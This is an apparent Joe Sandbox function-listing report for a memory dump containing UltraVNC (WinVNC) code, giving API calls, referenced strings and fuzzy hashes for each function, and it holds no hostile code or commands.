Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: ProcessWindow$CurrentFindThread
String ID: WinVNC Tray Icon
API String ID: 1332243453-1071638575
Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
Instruction ID: a428aa686151729d7a7d81b931066bcecb39091ceffa666c7211c877be084742
Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
Instruction Fuzzy Hash: 27F03621A2C74182EBA49B75B441469E2B1FF88B84FC42035EA5E46755EF3CE585CB10

Function 00007FF790CEAB9C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF790CEABE5,?,?,00000028,00007FF790CE8C7D,?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749), ref: 00007FF790CEABAB
GetProcAddress.KERNEL32(?,?,000000FF,00007FF790CEABE5,?,?,00000028,00007FF790CE8C7D,?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749), ref: 00007FF790CEABC0

Strings

CorExitProcess, xrefs: 00007FF790CEABB6
mscoree.dll, xrefs: 00007FF790CEABA4

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
Instruction ID: 07908d4a80fafc6cd67fda66865c880020baab439d4e3ccd326b7ce5c3d98930
Opcode Fuzzy Hash: d573404f7ef66e7e53db4b5603dce5d10115590628a6e511c9f9a65fb346890a
Instruction Fuzzy Hash: 88E0EC20B3670252FE29BB71A88457893B1AF59700BCC6478C41E06390EE6CF9998260

Function 00007FF790C522C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF790C52328

Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8

free.LIBCMT ref: 00007FF790C52564
free.LIBCMT ref: 00007FF790C52617

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

Strings

l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF790C5230B

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
API String ID: 1063416079-2438250478
Opcode ID: c273d361c54b140607c5df8769fb8004b8d8c010dfb8c9ff937b48554944af27
Instruction ID: 5c0726f80def7a8d3993b49a70d15f95181e258d5521927a8b2409f7769856e1
Opcode Fuzzy Hash: c273d361c54b140607c5df8769fb8004b8d8c010dfb8c9ff937b48554944af27
Instruction Fuzzy Hash: 0FA17E2A718A9184EB60EB36D4542ED63A0FF86FA8F944232DE2E577E5DF38D445C310

Function 00007FF790C5A580 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 152COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790C5A75F
LeaveCriticalSection.KERNEL32 ref: 00007FF790C5A78F

Strings

i, xrefs: 00007FF790C5A754
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF790C5A5D6

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
API String ID: 3168844106-2727237473
Opcode ID: 7ea70ecdf00bad4228af3a672ca1c2fbbeb6b4775179ba25f3cb68a3c055f025
Instruction ID: deff6168abec9eb99b99486d080b019d1101013a9f62cf0372687293ef6e226e
Opcode Fuzzy Hash: 7ea70ecdf00bad4228af3a672ca1c2fbbeb6b4775179ba25f3cb68a3c055f025
Instruction Fuzzy Hash: 5161CC2662C7C299EA74AB3694047FAA7A0FF4A794F840235EA9D477C1DF3CE485C710

Function 00007FF790C40B70 Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

GetRegionData.GDI32 ref: 00007FF790C40C9E
GetRegionData.GDI32 ref: 00007FF790C40CCB
GetRegionData.GDI32 ref: 00007FF790C40CF6
DeleteObject.GDI32 ref: 00007FF790C40D1D

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: DataRegion$DeleteObject
String ID:
API String ID: 3467850875-0
Opcode ID: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
Instruction ID: a7398f690123c81dd3dc51e3571af73b33f4293bf4b5cbb54e68ab40f7a74d8c
Opcode Fuzzy Hash: 1f6b7bd39306c6eb13a2533e0f8714bb7e9861b2c2e459677397d180e8f13865
Instruction Fuzzy Hash: DA51A0B2A15A41C7D760DF39D480AADB7F1FB49B94B959232DA4D83754DF38E882CB00

Function 00007FF790CF8704 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

_lock.LIBCMT ref: 00007FF790CF8718

Part of subcall function 00007FF790CF77D0: _amsg_exit.LIBCMT ref: 00007FF790CF77FA

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF790CF87D0
free.LIBCMT ref: 00007FF790CF87E5
EnterCriticalSection.KERNEL32 ref: 00007FF790CF8807

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$CountEnterInitializeSpin_amsg_exit_lockfree
String ID:
API String ID: 3786353176-0
Opcode ID: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
Instruction ID: faa1d5519ba1a639b067928c08b2525f7659b627cf30bbcc412b8aead3b8babd
Opcode Fuzzy Hash: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
Instruction Fuzzy Hash: CF418226A38A4285EB20AB35D5553BDB361FF45B80F955136DA4D073E1CF2CF4048325

Function 00007FF790C3C590 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF790C3C5D4

Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8

Strings

VUUU, xrefs: 00007FF790C3C658
VUUU, xrefs: 00007FF790C3C5B3
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/, xrefs: 00007FF790C3C5F8

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno$AllocHeap_callnewhmalloc
String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/$VUUU$VUUU
API String ID: 908589684-1814909704
Opcode ID: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
Instruction ID: a062214b49344586410f3fe9f62a9f9bd63850d509a631d5c7468e3b61fcba2a
Opcode Fuzzy Hash: 5345fd7311f357fadc130072c2608bf0beca503ebc7595e42aae47cd0f82b0d0
Instruction Fuzzy Hash: 9F219C33B28B9546D7609B79A880268F7A5EB45791F881236EBAC47BC5DE39E042C710

Function 00007FF790CE99CC Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF790CE9923
_invalid_parameter_noinfo.LIBCMT ref: 00007FF790CE992E
_errno.LIBCMT ref: 00007FF790CE9960
_errno.LIBCMT ref: 00007FF790CE9972

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno$_invalid_parameter_noinfo
String ID:
API String ID: 2819658684-0
Opcode ID: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
Instruction ID: e80e85fb94999ca63946e6585dc9687735528f3f174e108878028b6cd98200b8
Opcode Fuzzy Hash: 859027ed417ea2719fff98fb652ef308f396c22346242a752418a20ea244bd4e
Instruction Fuzzy Hash: 29218021A2D28345FB31BB3169122BDE2D4AF46BC0F845435EE8D47B86DE2CF901A721

Function 00007FF790C65940 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF790CE7978: malloc.LIBCMT ref: 00007FF790CE7992

InitializeCriticalSection.KERNEL32 ref: 00007FF790C65995

Part of subcall function 00007FF790CF2950: RaiseException.KERNEL32 ref: 00007FF790CF29CB

EnterCriticalSection.KERNEL32 ref: 00007FF790C659DF
LeaveCriticalSection.KERNEL32 ref: 00007FF790C65A0B

Strings

G, xrefs: 00007FF790C659D4

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterExceptionInitializeLeaveRaisemalloc
String ID: G
API String ID: 2834860089-985283518
Opcode ID: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
Instruction ID: d4765061f98e781f0461a707d6ef2d1e1a6d4e453a41da1f191b25a7d1689fd1
Opcode Fuzzy Hash: 163d903ced7c1d504fa84a9e51e7384b3b992433d33170fc57d78eaf579be50a
Instruction Fuzzy Hash: 02318132528B8286E720AF74E4442A8B3A4FF45BA4F941235DA9D47BD5CF7CF491C721

Function 00007FF790C3A290 Relevance: 6.1, APIs: 4, Instructions: 57comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00007FF790C3A2B8
CoCreateInstance.OLE32 ref: 00007FF790C3A2E5
CoUninitialize.OLE32 ref: 00007FF790C3A320

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: CreateInitializeInstanceUninitialize
String ID:
API String ID: 948891078-0
Opcode ID: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
Instruction ID: ec724c17b29fc4fb664716f28e06fb7fd872ecdca6306281166b5cc1f34e414c
Opcode Fuzzy Hash: 5481b7ab5fc5c7fceea0fc204020ee9c7aeb27894877d551f4c9081dc7f6ea27
Instruction Fuzzy Hash: 81213032A29B4182E760DB39E44426EB3B0FB89B54F901131EB9E837A4DF3DE454CB10

Function 00007FF790CB3CA0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00007FF790CB3CCE

Part of subcall function 00007FF790CE8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF790CE8C64
Part of subcall function 00007FF790CE8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF790CF329C,?,?,?,00007FF790CF7749,?,?,?,00007FF790CF77F3), ref: 00007FF790CE8C89
Part of subcall function 00007FF790CE8C34: _callnewh.LIBCMT ref: 00007FF790CE8CA2
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CAD
Part of subcall function 00007FF790CE8C34: _errno.LIBCMT ref: 00007FF790CE8CB8

free.LIBCMT ref: 00007FF790CB3CFA

Part of subcall function 00007FF790CE8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C0A
Part of subcall function 00007FF790CE8BF4: _errno.LIBCMT ref: 00007FF790CE8C14
Part of subcall function 00007FF790CE8BF4: GetLastError.KERNEL32(?,?,?,00007FF790CE748C), ref: 00007FF790CE8C1C

free.LIBCMT ref: 00007FF790CB3D0E

Strings

Unable to allocate memory in zip library at %s, xrefs: 00007FF790CB3D18

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
String ID: Unable to allocate memory in zip library at %s
API String ID: 1063416079-1743894623
Opcode ID: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
Instruction ID: e4905d43d6026afbbe0b9cdd6cc7918fad808520f8513c918f32550e3019210d
Opcode Fuzzy Hash: ba376857e1607f634655ae19f1f2692845fd45ced7f8db6e81b9ee0e7955995e
Instruction Fuzzy Hash: E611B421639B8285EA70EB35A5401BAB760EF46794F881232EA9D477D6CE2CF541C714

Function 00007FF790CA1660 Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

GlobalUnlock.KERNEL32 ref: 00007FF790CA16AC
GlobalFree.KERNEL32 ref: 00007FF790CA16C5
GlobalUnlock.KERNEL32 ref: 00007FF790CA1704
GlobalFree.KERNEL32 ref: 00007FF790CA171D

Memory Dump Source

Source File: 00000018.00000002.1546028684.00007FF790C31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF790C30000, based on PE: true

Associated: 00000018.00000002.1546002801.00007FF790C30000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546211021.00007FF790D09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546245952.00007FF790D3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546331123.00007FF790D3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790D8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546375815.00007FF790DB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790DF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790E64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000018.00000002.1546453104.00007FF790EAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ff790c30000_browser_sn.jbxd

Yara matches

Similarity

API ID: Global$FreeUnlock
String ID:
API String ID: 1239146723-0
Opcode ID: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
Instruction ID: c3363f2d7a3ad03bb9ef2588534dbebb0594f1cb7a5e3c741013dc8b711ea9e6
Opcode Fuzzy Hash: abdc864418634cf1197187ec179a29c8207377b801291dd9a7c0c602e8c7d055
Instruction Fuzzy Hash: 5E214F25A39A4186EB20AF31E8501A8A3B8FF84F84F485435EE4D83754CF7CE461C750

Function 00007FF790CC79A0 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF790CC79C7
